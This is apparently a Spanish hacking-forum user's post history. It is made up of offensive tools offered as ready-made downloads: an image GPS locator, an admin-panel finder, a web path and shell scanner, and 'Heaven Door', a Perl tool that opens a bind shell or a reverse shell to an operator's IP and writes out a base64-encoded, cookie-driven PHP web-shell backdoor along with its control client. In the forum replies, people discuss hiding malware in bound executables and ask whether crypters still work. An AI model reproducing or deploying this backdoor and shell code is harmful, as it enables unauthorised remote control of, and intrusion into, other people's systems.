1
Noticias Informáticas / Re:FBI Arresta al creador de Nanocore RAT
« en: Abril 05, 2017, 08:59:25 am »
Espero que no sea el mismo aeonhack que hizo los skins de C# que publique en este mismo foro.
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
#!usr/bin/perl
# DH Image Locate 0.3
#(C) Doddy Hackman 2016
use Image::ExifTool;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
GetOptions(
"dump_all=s" => \$dump_all,
"dump_gps_tags=s" => \$dump_gps_tags,
"locate=s" => \$locate
);
head();
if ($dump_all) {
if ( -f $dump_all ) {
printear_titulo("[+] Finding information in : ");
print $dump_all. "\n\n";
dump_all($dump_all);
}
else {
printear("[-] File not found\n");
}
}
elsif ($dump_gps_tags) {
if ( -f $dump_gps_tags ) {
printear_titulo("[+] Finding GPS tags in : ");
print $dump_gps_tags. "\n\n";
dump_gps_tags_and_locate($dump_gps_tags,"0");
}
else {
printear("[-] File not found\n");
}
}
elsif ($locate) {
if ( -f $locate ) {
printear_titulo("[+] Scanning photo : ");
print $locate. "\n\n";
dump_gps_tags_and_locate($locate,"1");
}
else {
printear("[-] File not found\n");
}
} else {
sintax();
}
copyright();
# Functions
sub dump_all {
my $imagen_target = $_[0];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
for my $abriendo_imagen ( $datos_imagen->GetFoundTags("Group0") ) {
my $valor = $informacion_imagen->{$abriendo_imagen};
printear("[+] $abriendo_imagen : ");
print $valor. "\n";
}
}
sub dump_gps_tags_and_locate {
my $imagen_target = shift;
my $locate = shift;
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
my $latitud = $informacion_imagen->{GPSLatitude};
my $longitud = $informacion_imagen->{GPSLongitude};
my $altitud = $informacion_imagen->{GPSAltitude};
my $fecha = $informacion_imagen->{GPSDateTime};
my $posicion_real = $informacion_imagen->{GPSPosition};
my $finder_ready = 0;
if($latitud ne "") {
printear("[+] Latitude : ");
print $latitud. "\n";
} else {
printear("[-] Latitude : ");
print "Not Found". "\n";
}
if($longitud ne "") {
printear("[+] Longitude : ");
print $longitud. "\n";
} else {
printear("[-] Longitude : ");
print "Not Found". "\n";
}
if($latitud ne "") {
printear("[+] Altitude : ");
print $altitud. "\n";
} else {
printear("[-] Altitude : ");
print "Not Found". "\n";
}
if($fecha ne "") {
printear("[+] DateTime : ");
print $fecha. "\n";
} else {
printear("[-] DateTime : ");
print "Not Found". "\n";
}
if($posicion_real ne "") {
printear("[+] Position : ");
print $posicion_real. "\n";
$finder_ready = 1;
} else {
printear("[-] Position : ");
print "Not Found". "\n";
$finder_ready = 0;
}
if($locate eq "1") {
if($finder_ready eq "1") {
my $gps_split = $posicion_real;
$gps_split =~ s/deg//g;
$gps_split =~ s/'//g;
$gps_split =~ s/"//g;
$gps_split =~ s/W//g;
$gps_split =~ s/N,/-/g;
$gps_split =~ s/ / /g;
my $url = "https://www.google.com.ar/maps/search/".$gps_split."/";
printear_titulo("\n[!] Position Located\n\n");
printear("[+] GPS : ");
print $gps_split."\n";
printear("\n[?] Open in browser [y,n] : ");
chomp(my $rta = <STDIN>);
if($rta=~/y/ig) {
printear_titulo("\n[+] Enjoy the program !\n");
system("start firefox \"" . $url."\"");
} else {
printear("\n[+] GoogleMaps : ");
print $url. "\n";
}
} else {
printear_titulo("\n[-] Position GPS not available");
}
}
}
# More Functions
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-dump_all <image> : Get all information of a image\n";
print "-dump_gps <image> : Get all tags GPS of a image\n";
print "-locate <image> : Locate Image in GoogleMaps\n";
printear("\n[+] Example : ");
print "perl dh_image_locate.pl -dump_all test.jpg\n";
copyright();
}
sub head {
printear_logo("\n-- == DH Image Locate 0.3 == --\n\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
exit(1);
}
#The End ?
me pueden conseguir el ircplus para poder practicarlo
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD
Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.
Genial, aunque creo ya no sirven los crypters hoy en dia, o si?
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD
// Admin Finder 1.0
// (C) Doddy Hackman 2016
unit finder;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls,
Vcl.ComCtrls, idHTTP, OtlThreadPool, OtlComm, OtlTask,
OtlTaskControl, Vcl.Imaging.pngimage;
type
TFormHome = class(TForm)
imgLogo: TImage;
gbEnterConfiguration: TGroupBox;
lblPage: TLabel;
lblThreads: TLabel;
txtPage: TEdit;
txtThreads: TEdit;
udThreads: TUpDown;
gbConsole: TGroupBox;
mmOutput: TMemo;
btnStart: TButton;
btnStop: TButton;
status: TStatusBar;
procedure btnStopClick(Sender: TObject);
procedure btnStartClick(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
FormHome: TFormHome;
implementation
{$R *.dfm}
// Functions
function message_box(title, message_text, type_message: string): string;
begin
if not(title = '') and not(message_text = '') and not(type_message = '') then
begin
try
begin
if (type_message = 'Information') then
begin
MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
MB_ICONINFORMATION);
end
else if (type_message = 'Warning') then
begin
MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
MB_ICONWARNING);
end
else if (type_message = 'Question') then
begin
MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
MB_ICONQUESTION);
end
else if (type_message = 'Error') then
begin
MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
MB_ICONERROR);
end
else
begin
MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
MB_ICONINFORMATION);
end;
Result := '[+] MessageBox : OK';
end;
except
begin
Result := '[-] Error';
end;
end;
end
else
begin
Result := '[-] Error';
end;
end;
function check_page(page: string): boolean;
var
nave: TIdHTTP;
begin
try
begin
nave := TIdHTTP.Create(nil);
nave.Request.UserAgent :=
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0';
nave.Get(page);
if nave.ResponseCode = 200 then
begin
Result := True;
end
else
begin
Result := False;
end;
nave.Free();
end;
except
begin
Result := False;
end;
end;
end;
//
procedure TFormHome.btnStartClick(Sender: TObject);
var
i: integer;
path: string;
const
paths: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
'administracion/', 'administracion/index.php', 'administracion/login.php',
'administracion/ingresar.php', 'administracion/admin.php',
'administration/', 'administration/index.php', 'administration/login.php',
'administrator/index.php', 'administrator/login.php',
'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
'login.php', 'administrador.php', 'administration.php', 'administrator.php',
'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
'admin/account.php', 'admin/account.html', 'admin/index.html',
'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
'administrator/login.html', 'administrator/account.html',
'administrator/account.php', 'administrator.html', 'login.html',
'modelsearch/login.php', 'moderator.php', 'moderator.html',
'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
'controlpanel/', 'controlpanel.php', 'controlpanel.html',
'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
'database_administration/', 'power_user/', 'system_administration/',
'ss_vms_admin_sm/');
begin
if not(txtPage.Text = '') and not(txtThreads.Text = '') then
begin
GlobalOmniThreadPool.MaxExecuting := StrToInt(txtThreads.Text) *
System.CPUCount;
status.Panels[0].Text := '[+] Scanning ...';
FormHome.Update;
for i := Low(paths) to High(paths) do
begin
Application.ProcessMessages;
path := txtPage.Text + '/' + paths[i];
CreateTask(
procedure(const task: IOmniTask)
var
path_to_load: string;
begin
path_to_load := task.Param['path'].AsString;
status.Panels[0].Text := 'Checking : ' + path_to_load + ' ...';
FormHome.Update;
if (check_page(path_to_load)) then
begin
mmOutput.Lines.Add(path_to_load);
end;
end).SetParameter('path', path).Unobserved.Schedule;
end;
while GlobalOmniThreadPool.CountExecuting +
GlobalOmniThreadPool.CountQueued > 0 do
begin
Application.ProcessMessages;
end;
status.Panels[0].Text := '[+] Finished';
FormHome.Update;
message_box('Admin Finder 1.0', 'Scan Finished', 'Information');
end
else
begin
message_box('Admin Finder 1.0', 'Complete the configuration', 'Warning');
end;
end;
procedure TFormHome.btnStopClick(Sender: TObject);
begin
GlobalOmniThreadPool.CancelAll;
status.Panels[0].Text := '[+] Stopped';
FormHome.Update;
message_box('Admin Finder 1.0', 'Scan Stopped', 'Information');
end;
end.
// The End ?
# !usr/bin/perl
# DH Secret Finder 0.8
# (C) Doddy Hackman 2016
# Credits for the arrays :
# Dirs : directory-list-2.3-small.txt - Copyright 2007 James Fisher
# Files : Based in wfuzz-1.4
# Link for Files : https://raw.githubusercontent.com/tuwid/darkc0de-old-stuff/master/wfuzz-1.4/wordlists/common.txt
# Shells : Based in https://github.com/bhavyanshu/Shell-Finder
use LWP::UserAgent;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
GetOptions(
"panels" => \$panels,
"domains" => \$domains,
"dirs" => \$dirs,
"files" => \$files,
"shells" => \$shells,
"url=s" => \$url,
"savefile=s" => \$savefile,
"verbose" => \$verbose
);
head();
if ($panels) {
if($panels && $url) {
search($url,"panel");
} else {
sintax();
}
}
elsif ($domains) {
if($domains && $url) {
search($url,"domain");
} else {
sintax();
}
}
elsif ($dirs) {
if($dirs && $url) {
search($url,"dir");
} else {
sintax();
}
}
elsif ($files) {
if($files && $url) {
search($url,"file");
} else {
sintax();
}
}
elsif ($shells) {
if($shells && $url) {
search($url,"shell");
} else {
sintax();
}
}
else {
sintax();
}
copyright();
# Functions
sub search {
my ($url,$type) = @_;
my $wordlist = "";
my $name = "";
if($type eq "panel") {
$wordlist = "wordlists/panels.txt";
$name = "Panels";
} elsif($type eq "domain") {
$wordlist = "wordlists/domains.txt";
$name = "Domains";
} elsif($type eq "dir") {
$wordlist = "wordlists/directories.txt";
$name = "Directories";
} elsif($type eq "file") {
$wordlist = "wordlists/files.txt";
$name = "Files";
} elsif($type eq "shell") {
$wordlist = "wordlists/shells.txt";
$name = "Shells";
} else {
$wordlist = "wordlists/panels.txt";
$name = "Panels";
}
my $cantidad = 0;
if(-f $wordlist) {
printear_titulo("[+] Loading Wordlist ...\n");
my @wordlist = load_wordlist($wordlist);
printear("\n[+] Wordlist Loaded : ");
print int(@wordlist)." lines\n";
printear_logo("\n[+] Searching $name in $url ...\n\n");
for my $line(@wordlist) {
chomp $line;
my $link = "";
if($type eq "domain") {
$link = $line.".".$url;
} else {
$link = $url."/".$line;
}
if(check_page($link)) {
if($verbose) {
printear("[+] Checking ");
printear_logo("$link : ");
printear_azul("OK\n");
} else {
printear_azul("[+] Link : $link\n");
}
$cantidad++;
if($savefile) {
savefile($savefile,"[+] Link : $link");
}
} else {
if($verbose) {
printear("[+] Checking ");
printear_logo("$link : ");
printear_rojo("FAIL\n");
}
}
}
printear("\n[+] $name Found : ");
print "$cantidad\n";
if($cantidad eq "0") {
printear("\n[-] $name not found\n");
}
if($savefile) {
printear_logo("\n[+] Logs $savefile saved\n");
}
printear_titulo("\n[+] Finished\n");
} else {
printear_rojo("\n[-] Wordlist not exists");
}
}
# More Functions
sub check_page {
my $url = shift;
my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
$nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
$nave->timeout(10);
my $code = $nave->get($url);
if ($code->is_success) {
return 1;
} else {
return 0;
}
}
sub load_wordlist {
my @result;
my @words;
open( FILE, $_[0] );
@words = <FILE>;
close FILE;
for (@words) {
push( @result, $_ );
}
return (@result);
}
sub savefile {
my ($filename,$text) = @_;
open( SAVE, ">>" . $filename );
print SAVE $text . "\n";
close SAVE;
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub printear_rojo {
cprint( "\x035" . $_[0] . "\x030" );
}
sub printear_azul {
cprint( "\x033" . $_[0] . "\x030" );
}
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-panel -url <url> : Find panel administration in the URL\n";
print "-domain -url <url> : Find domains in the URL\n";
print "-dirs -url <url> : Find directories in the URL\n";
print "-files -url <url> : Find files in the URL\n";
print "-shells -url <url> : Find shells in the URL\n";
print "-savefile <filename> : Save results\n";
printear("\n[+] Example : ");
print "perl secret_finder.pl -shells http://localhost/ -savefile results.txt\n";
copyright();
}
sub head {
printear_logo("\n-- == DH Secret Finder 0.8 == --\n\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
exit(1);
}
#The End ?
# !usr/bin/perl
# Heaven Door 1.0
# (C) Doddy Hackman 2016
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use IO::Socket::SSL;
use Cwd;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
GetOptions(
"backdoor" => \$backdoor,
"reverse" => \$reverse,
"ip=s" => \$ip,
"port=s" => \$port,
"generate_backdoor" => \$generate_backdoor,
"filename=s" => \$filename,
"connect_backdoor" => \$connect_backdoor,
"url=s" => \$url
);
head();
if ($backdoor) {
if($backdoor && $port) {
backdoor($port);
} else {
sintax();
}
}
elsif ($reverse) {
if($reverse && $ip && $port) {
reverse_shell($ip,$port);
} else {
sintax();
}
}
elsif ($generate_backdoor) {
if($filename) {
cargar_generador_backdoor($filename);
} else {
sintax();
}
}
elsif ($connect_backdoor) {
if($url) {
cargar_consola_backdoor($url);
} else {
sintax();
}
}
else {
sintax();
}
copyright();
# Functions
# Simple backdoor
sub backdoor {
my($port) = @_;
$backdoor = IO::Socket::INET->new(Proto=> 'tcp',LocalPort =>$port,Listen=> SOMAXC,Reuse=> 1);
printear("[+] Heaven_Door : ");
print "Online\n";
printear("[+] Port : ");
print "$port\n";
printear("[+] PID : ");
print "$$\n\n";
printear_titulo("[+] Connected");
while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[+] Heaven_Door : Online\n[+] Port : 25256\n[+] PID : ".$$."\n\n";
print $jesus "Welcome ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}
sub extras {
if ($^O =~/Win32/ig) {
use if $^O eq "MSWin32", "Win32";
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n";
} else {
$output = `uname -a`;
print $jesus "--==System Info==--\n\n".$output."\n";
}
}
}
#
# Reverse Shell
sub reverse_shell {
my($ip,$port) = @_;
printear_titulo("[+] Reverse Shell : ");
print "Loaded\n\n";
printear("[+] IP to connect : ");
print $ip."\n";
printear("[+] Port : ");
print $port."\n\n";
printear_logo("[+] Connecting ...\n\n");
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($port,inet_aton($ip)));
printear_titulo("[+] Reverse Shell successful\n\n");
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
tipo();
printear_logo("[+] Disconnecting ...\n\n");
}
sub tipo {
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}
sub infowin {
use if $^O eq "MSWin32", "Win32";
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n";
}
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n";
}
#
# More Functions
sub cargar_consola_backdoor {
printear("[+] Checking Backdoor ...\n\n");
my $check1 = cargar_comando($url,"ver");
my $check2 = cargar_comando($url,"uname -a");
if(check_backdoor($check1) or check_backdoor($check2)) {
printear_logo("[+] Backdoor Loaded\n");
my($url) = @_;
while(1) {
printear("\n[+] Command : ");
chomp( my $comando = <stdin> );
if ( $comando =~ /exit/ ) {
copyright();
}
my $code = cargar_comando($url,$comando);
if(check_backdoor($code)) {
my $output = extract_command_backdoor($code);
if($output ne "") {
printear_titulo("\n".$output."\n");
} else {
printear_titulo("\n"."[-] Invalid command"."\n");
}
} else {
printear_titulo("\n"."[-] Invalid command"."\n");
}
}
} else {
printear_logo("[+] Backdoor not exists\n");
}
}
sub check_backdoor {
my $text = shift;
if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
return 1;
} else {
return 0;
}
}
sub extract_command_backdoor {
my $text = shift;
if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
return $1;
} else {
return "";
}
}
sub cargar_generador_backdoor {
my $filename = shift;
if(-f $filename) {
unlink($filename);
}
printear_titulo("[+] Generating backdoor ...\n\n");
generar_backdoor($filename);
if(-f $filename) {
printear("[+] Backdoor $filename generated !\n");
} else {
printear("[-] Error generating backdoor\n");
}
}
sub generar_backdoor {
my $filename = shift;
my $code = "PD9waHAgaWYgKGlzc2V0KCRfQ09PS0lFWyJoZWF2ZW5fZG9vcl9oZXJlIl0pICYmICFlbXB0eSgkX0NPT0tJRVsiaGVhdmVuX2Rvb3JfaGVyZSJdKSkgeyAJJGNvZGUgPSAiIjsgCSRvdXRwdXQgPSAiIjsgCWV4ZWMoJF9DT09LSUVbImhlYXZlbl9kb29yX2hlcmUiXSwkY29kZSk7IAlmb3JlYWNoICgkY29kZSBhcyAkbGluZSkgeyAJCSRvdXRwdXQgPSAkb3V0cHV0IC4gJGxpbmUuIlxuIjsgCX0gCWVjaG8gYmFzZTY0X2VuY29kZSgiW2NvZGVfaGVhdmVuXSIuJG91dHB1dC4iWy9jb2RlX2hlYXZlbl0iKTsgfSA";
savefile($filename,decode_base64($code));
}
sub cargar_comando {
my($url,$command) = @_;
my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
$nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
$nave->timeout(10);
my $contenido = $nave->get($url,Cookie => "heaven_door_here=".$command)->content;
return decode_base64($contenido);
}
sub savefile {
my ($filename,$text) = @_;
open( SAVE, ">>" . $filename );
print SAVE $text . "\n";
close SAVE;
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-backdoor -port <port> : Enable backdoor in port\n";
print "-reverse -ip <ip> -port <port> : Get all tags GPS of a image\n";
print "-generate_backdoor -filename <filename> : Generate backdoor in filename\n";
print "-connect_backdoor -url <url> : Connect to backdoor in URL\n";
printear("\n[+] Example : ");
print "perl heaven_door.pl -reverse -ip 127.0.0.1 -port 666\n";
copyright();
}
sub head {
printear_logo("\n-- == Heaven Door 1.0 == --\n\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
exit(1);
}
#The End ?